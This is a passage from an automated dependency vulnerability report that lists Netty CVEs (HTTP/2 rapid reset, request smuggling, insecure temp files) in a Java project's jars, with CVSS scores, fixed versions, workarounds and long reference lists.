CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022 - [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final - [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0 - [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec:4.1.38.Final)File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec/pom.xmlMD5: f86cd9629ef9997dcdfaee79eaa738d9SHA1: e12715d67d804245f7462124377f8c83e29ece8eSHA256: eb31c27208618397c01481bb77cbb8ae21fddfde8db84ca6d3437d6469f81891Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid netty-codec Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Codec High Vendor pom parent-artifactid netty-parent Low Product pom artifactid netty-codec Highest Product pom groupid io.netty Highest Product pom name Netty/Codec High Product pom parent-artifactid netty-parent Medium Version pom version 4.1.38.Final Highest
CVE-2019-20444 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References:
- FEDORA-2020-66b5f85ccc - [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image - [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444) - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12 - [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445 - [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java11 #39 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java8 #38 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-master-maven-jdk11 #361 - [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E DEBIAN - DSA-4885 MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final MISC - https://github.com/netty/netty/issues/9866 MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-20444] 